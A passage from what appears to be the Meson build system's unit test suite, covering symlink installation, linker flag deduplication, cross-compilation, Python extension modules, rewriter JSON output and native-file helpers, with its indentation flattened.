with chdir(subdir):
# Can't distribute broken symlinks in the source tree because it breaks
# the creation of zipapps. Create it dynamically and run the test by
# hand.
src = '../../nonexistent.txt'
os.symlink(src, 'invalid-symlink.txt')
try:
self.init(testdir)
self.build()
self.install()
install_path = subdir_path.split(os.path.sep)[-1]
link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt')
self.assertTrue(os.path.islink(link), msg=link)
self.assertEqual(src, os.readlink(link))
self.assertFalse(os.path.isfile(link), msg=link)
finally:
os.remove(os.path.join(subdir, 'invalid-symlink.txt'))
def test_install_subdir_symlinks(self):
self.install_subdir_invalid_symlinks('62 install subdir', os.path.join('sub', 'sub1'))
def test_install_subdir_symlinks_with_default_umask(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub2')
def test_install_subdir_symlinks_with_default_umask_and_mode(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub1')
@skipIfNoPkgconfigDep('gmodule-2.0')
def test_ldflag_dedup(self):
testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup')
if is_cygwin() or is_osx():
raise unittest.SkipTest('Not applicable on Cygwin or OSX.')
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
linker = cc.linker
if not linker.export_dynamic_args(env):
raise unittest.SkipTest('Not applicable for linkers without --export-dynamic')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
max_count = 0
search_term = '-Wl,--export-dynamic'
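# The flag should appear on some link line, but never more than once on
# any single line: a max_count above 1 means deduplication failed, while
# 0 means the flag was dropped entirely.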
with open(build_ninja, 'r', encoding='utf-8') as f:
for line in f:
max_count = max(max_count, line.count(search_term))
self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.')
def test_compiler_libs_static_dedup(self):
testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
lines = f.readlines()
for lib in ('-ldl', '-lm', '-lc', '-lrt'):
for line in lines:
if lib not in line:
continue
# Assert that the library appears exactly once on this link line, i.e. it was deduplicated
self.assertEqual(len(line.split(lib)), 2, msg=(lib, line))
@skipIfNoPkgconfig
def test_noncross_options(self):
# C_std defined in project options must be in effect also when native compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir])
compdb = self.get_compdb()
self.assertEqual(len(compdb), 2)
self.assertRegex(compdb[0]['command'], '-std=c99')
self.assertRegex(compdb[1]['command'], '-std=c99')
self.build()
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
nativefile = tempfile.NamedTemporaryFile(mode='w')
nativefile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'build_wrapper.py')))
nativefile.flush()
self.meson_native_file = nativefile.name
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir)
def test_identity_cross_env(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
env = {
'CC_FOR_BUILD': '"' + os.path.join(testdir, 'build_wrapper.py') + '"',
}
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir, override_envvars=env)
@skipIfNoPkgconfig
def test_static_link(self):
if is_cygwin():
raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.")
# Build some libraries and install them
testdir = os.path.join(self.unit_test_dir, '68 static link/lib')
libdir = os.path.join(self.installdir, self.libdir)
oldprefix = self.prefix
self.prefix = self.installdir
self.init(testdir)
self.install(use_destdir=False)
# Test that the installed libraries work
self.new_builddir()
self.prefix = oldprefix
meson_args = ['-Dc_link_args=-L{}'.format(libdir),
'--fatal-meson-warnings']
testdir = os.path.join(self.unit_test_dir, '68 static link')
env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')}
self.init(testdir, extra_args=meson_args, override_envvars=env)
self.build()
self.run_tests()
def _check_ld(self, check: str, name: str, lang: str, expected: str) -> None:
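# Verify that requesting linker `name` through the per-language *_ld
# environment variable (and its deprecated alias, if any) makes the
# detected compiler report the linker id `expected`. `check` is the
# linker executable that must be present for the test to run.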
if is_sunos():
raise unittest.SkipTest('Solaris currently cannot override the linker.')
if not shutil.which(check):
raise unittest.SkipTest('Could not find {}.'.format(check))
envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]]
# Also test a deprecated variable if there is one.
if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP:
envvars.append(
mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
if lang != 'rust' and comp.use_linker_args('bfd') == []:
raise unittest.SkipTest(
'Compiler {} does not support using alternative linkers'.format(comp.id))
self.assertEqual(comp.linker.id, expected)
def test_ld_environment_variable_bfd(self):
self._check_ld('ld.bfd', 'bfd', 'c', 'ld.bfd')
def test_ld_environment_variable_gold(self):
self._check_ld('ld.gold', 'gold', 'c', 'ld.gold')
def test_ld_environment_variable_lld(self):
self._check_ld('ld.lld', 'lld', 'c', 'ld.lld')
@skip_if_not_language('rust')
def test_ld_environment_variable_rust(self):
self._check_ld('ld.gold', 'gold', 'rust', 'ld.gold')
def test_ld_environment_variable_cpp(self):
self._check_ld('ld.gold', 'gold', 'cpp', 'ld.gold')
@skip_if_not_language('objc')
def test_ld_environment_variable_objc(self):
self._check_ld('ld.gold', 'gold', 'objc', 'ld.gold')
@skip_if_not_language('objcpp')
def test_ld_environment_variable_objcpp(self):
self._check_ld('ld.gold', 'gold', 'objcpp', 'ld.gold')
@skip_if_not_language('fortran')
def test_ld_environment_variable_fortran(self):
self._check_ld('ld.gold', 'gold', 'fortran', 'ld.gold')
@skip_if_not_language('d')
def test_ld_environment_variable_d(self):
# At least for me, ldc defaults to gold, and gdc defaults to bfd, so
# let's pick lld, which isn't the default for either (currently)
self._check_ld('ld.lld', 'lld', 'd', 'ld.lld')
def compute_sha256(self, filename):
with open(filename, 'rb') as f:
return hashlib.sha256(f.read()).hexdigest()
def test_wrap_with_file_url(self):
testdir = os.path.join(self.unit_test_dir, '74 wrap file url')
source_filename = os.path.join(testdir, 'subprojects', 'foo.tar.xz')
patch_filename = os.path.join(testdir, 'subprojects', 'foo-patch.tar.xz')
wrap_filename = os.path.join(testdir, 'subprojects', 'foo.wrap')
source_hash = self.compute_sha256(source_filename)
patch_hash = self.compute_sha256(patch_filename)
wrap = textwrap.dedent("""\
[wrap-file]
directory = foo
source_url = http://server.invalid/foo
source_fallback_url = file://{}
source_filename = foo.tar.xz
source_hash = {}
patch_url = http://server.invalid/foo
patch_fallback_url = file://{}
patch_filename = foo-patch.tar.xz
patch_hash = {}
""".format(source_filename, source_hash, patch_filename, patch_hash))
with open(wrap_filename, 'w') as f:
f.write(wrap)
self.init(testdir)
self.build()
self.run_tests()
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'packagecache'))
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'foo'))
os.unlink(wrap_filename)
def test_no_rpath_for_static(self):
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
self.build()
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertIsNone(build_rpath)
def test_lookup_system_after_broken_fallback(self):
# Just to generate libfoo.pc so we can test system dependency lookup.
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
privatedir = self.privatedir
# Write test project where the first dependency() returns not-found
# because the 'broken' subproject does not exist, but that should not
# prevent the 2nd dependency() from being looked up on the system.
self.new_builddir()
with tempfile.TemporaryDirectory() as d:
with open(os.path.join(d, 'meson.build'), 'w') as f:
f.write(textwrap.dedent('''\
project('test')
dependency('notfound', fallback: 'broken', required: false)
dependency('libfoo', fallback: 'broken', required: true)
'''))
self.init(d, override_envvars={'PKG_CONFIG_LIBDIR': privatedir})
class BaseLinuxCrossTests(BasePlatformTests):
# Don't pass --libdir when cross-compiling. We have tests that
# check whether meson auto-detects it correctly.
libdir = None
def should_run_cross_arm_tests():
return shutil.which('arm-linux-gnueabihf-gcc') and not platform.machine().lower().startswith('arm')
@unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM")
class LinuxCrossArmTests(BaseLinuxCrossTests):
'''
Tests that cross-compilation to Linux/ARM works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt')
def test_cflags_cross_environment_pollution(self):
'''
Test that the CFLAGS environment variable does not pollute the cross
environment. This can't be an ordinary test case because we need to
inspect the compiler database.
'''
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'})
compdb = self.get_compdb()
self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command'])
def test_cross_file_overrides_always_args(self):
'''
Test that $lang_args in cross files always override get_always_args().
Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some
architectures such as some Android versions and Raspbian.
https://github.com/mesonbuild/meson/issues/3049
https://github.com/mesonbuild/meson/issues/3089
'''
testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args')
self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS')
self.build()
def test_cross_libdir(self):
# When cross compiling "libdir" should default to "lib"
# rather than "lib/x86_64-linux-gnu" or something like that.
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'lib')
return
self.fail('Option libdir not in introspect data.')
def test_cross_libdir_subproject(self):
# Guard against a regression where calling "subproject"
# would reset the value of libdir to its default value.
testdir = os.path.join(self.unit_test_dir, '78 subdir libdir')
self.init(testdir, extra_args=['--libdir=fuf'])
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'fuf')
return
self.fail('Libdir specified on command line gets reset.')
def test_std_remains(self):
# C_std defined in project options must be in effect also when cross compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-std=c99')
self.build()
@skipIfNoPkgconfig
def test_pkg_config_option(self):
if not shutil.which('arm-linux-gnueabihf-pkg-config'):
raise unittest.SkipTest('Cross-pkgconfig not found.')
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
def should_run_cross_mingw_tests():
return shutil.which('x86_64-w64-mingw32-gcc') and not (is_windows() or is_cygwin())
@unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW")
class LinuxCrossMingwTests(BaseLinuxCrossTests):
'''
Tests that cross-compilation to Windows/MinGW works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt')
def test_exe_wrapper_behaviour(self):
'''
Test that an exe wrapper that isn't found doesn't cause compiler sanity
checks and compiler checks to fail, but causes configure to fail if it
requires running a cross-built executable (custom_target or run_target)
and causes the tests to be skipped if they are run.
'''
testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour')
# Configures, builds, and tests fine by default
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
os.mkdir(self.builddir)
# Change cross file to use a non-existing exe_wrapper and it should fail
self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt')
# Force tracebacks so we can detect them properly
env = {'MESON_FORCE_BACKTRACE': '1'}
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*target.*use-exe-wrapper'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Drun-target=false',
inprocess=True,
override_envvars=env)
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*run target.*run-prog'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Dcustom-target=false',
inprocess=True,
override_envvars=env)
self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'],
override_envvars=env)
self.build()
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*PATH'):
# Must run in-process or we'll get a generic CalledProcessError
self.run_tests(inprocess=True, override_envvars=env)
@skipIfNoPkgconfig
def test_cross_pkg_config_option(self):
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
class PythonTests(BasePlatformTests):
'''
Tests that verify compilation of python extension modules
'''
def test_versions(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Skipping python tests with {} backend'.format(self.backend.name))
testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule')
# No python version specified, this will use meson's python
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
# When specifying a known name (python2 / python3), the module
# will also try 'python' as a fallback and use it if the major
# version matches
try:
self.init(testdir, extra_args=['-Dpython=python2'])
self.build()
self.run_tests()
except unittest.SkipTest:
# python2 is not necessarily installed on the test machine. If it is
# not, or the python headers can't be found, the test raises
# MESON_SKIP_TEST. We could check beforehand which versions of python
# are available, but that is the module's job (a bit of a chicken and
# egg situation), so we just ask for forgiveness rather than permission.
pass
self.wipe()
for py in ('pypy', 'pypy3'):
try:
self.init(testdir, extra_args=['-Dpython=%s' % py])
except unittest.SkipTest:
# Same as above, pypy2 and pypy3 are not expected to be present
# on the test system, the test project only raises in these cases
continue
# We have a pypy, this is expected to work
self.build()
self.run_tests()
self.wipe()
# The test is configured to error out with MESON_SKIP_TEST
# in case it cannot find the requested python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=not-python'])
self.wipe()
# While dir is an external command on both Windows and Linux,
# it certainly isn't python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=dir'])
self.wipe()
class RewriterTests(BasePlatformTests):
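# These tests drive the meson rewriter against small fixture projects and
# compare the JSON it reports (and the state of the rewritten build files)
# against expected dictionaries.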
def setUp(self):
super().setUp()
self.maxDiff = None
def prime(self, dirname):
copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir)
def rewrite_raw(self, directory, args):
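# Run the rewriter on `directory` with the given arguments and return its
# machine-readable output, which the rewriter prints as JSON on stderr.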
if isinstance(args, str):
args = [args]
command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args
p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True, timeout=60)
print('STDOUT:')
print(p.stdout)
print('STDERR:')
print(p.stderr)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
if not p.stderr:
return {}
return json.loads(p.stderr)
def rewrite(self, directory, args):
if isinstance(args, str):
args = [args]
return self.rewrite_raw(directory, ['command'] + args)
def test_target_source_list(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_add_sources_abs(self):
self.prime('1 basic')
abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']]
add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}])
inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}])
self.rewrite(self.builddir, add)
out = self.rewrite(self.builddir, inf)
expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}}
self.assertDictEqual(out, expected)
def test_target_remove_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_subdir(self):
self.prime('2 subdirs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']}
self.assertDictEqual(list(out['target'].values())[0], expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(list(out['target'].values())[0], expected)
def test_target_remove(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_remove_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, {})
def test_target_add_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c']}
self.assertDictEqual(out['target']['94b671c@@something@exe'], expected)
def test_target_source_sorting(self):
self.prime('5 sorting')
add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}])
inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}])
out = self.rewrite(self.builddir, add_json)
out = self.rewrite(self.builddir, inf_json)
expected = {
'target': {
'exe1@exe': {
'name': 'exe1',
'sources': [
'aaa/a/a1.c',
'aaa/b/b1.c',
'aaa/b/b2.c',
'aaa/f1.c',
'aaa/f2.c',
'aaa/f3.c',
'bbb/a/b1.c',
'bbb/b/b2.c',
'bbb/c1/b5.c',
'bbb/c2/b7.c',
'bbb/c10/b6.c',
'bbb/a4.c',
'bbb/b3.c',
'bbb/b4.c',
'bbb/b5.c',
'a1.c',
'a2.c',
'a3.c',
'a10.c',
'a20.c',
'a30.c',
'a100.c',
'a101.c',
'a110.c',
'a210.c',
'a666.c',
'b1.c',
'c2.c'
]
}
}
}
self.assertDictEqual(out, expected)
def test_target_same_name_skip(self):
self.prime('4 same name targets')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'myExe', 'sources': ['main.cpp']}
self.assertEqual(len(out['target']), 2)
for val in out['target'].values():
self.assertDictEqual(expected, val)
def test_kwargs_info(self):
self.prime('3 kwargs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']},
'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'},
'dependency#dep1': {'required': True, 'method': 'cmake'}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_add(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': 'GPL'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove_regex(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {},
'target#tgt1': {},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
class NativeFileTests(BasePlatformTests):
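# Tests for machine (native) file handling: the helpers below generate
# throwaway native files and wrapper scripts so that binaries, compilers
# and their reported versions can be overridden per test.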
def setUp(self):
super().setUp()
self.testcase = os.path.join(self.unit_test_dir, '47 native file binary')
self.current_config = 0
self.current_wrapper = 0
def helper_create_native_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
if isinstance(v, (bool, int, float)):
f.write("{}={}\n".format(k, v))
elif isinstance(v, list):
f.write("{}=[{}]\n".format(k, ', '.join(["'{}'".format(w) for w in v])))
else:
f.write("{}='{}'\n".format(k, v))
return filename
def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs):
"""Creates a wrapper around a binary that overrides specific values."""
filename = os.path.join(dir_ or self.builddir, 'binary_wrapper{}.py'.format(self.current_wrapper))
extra_args = extra_args or {}
self.current_wrapper += 1
if is_haiku():
chbang = '#!/bin/env python3'
else:
chbang = '#!/usr/bin/env python3'
with open(filename, 'wt') as f:
f.write(textwrap.dedent('''\
{}
import argparse
import subprocess
import sys
def main():
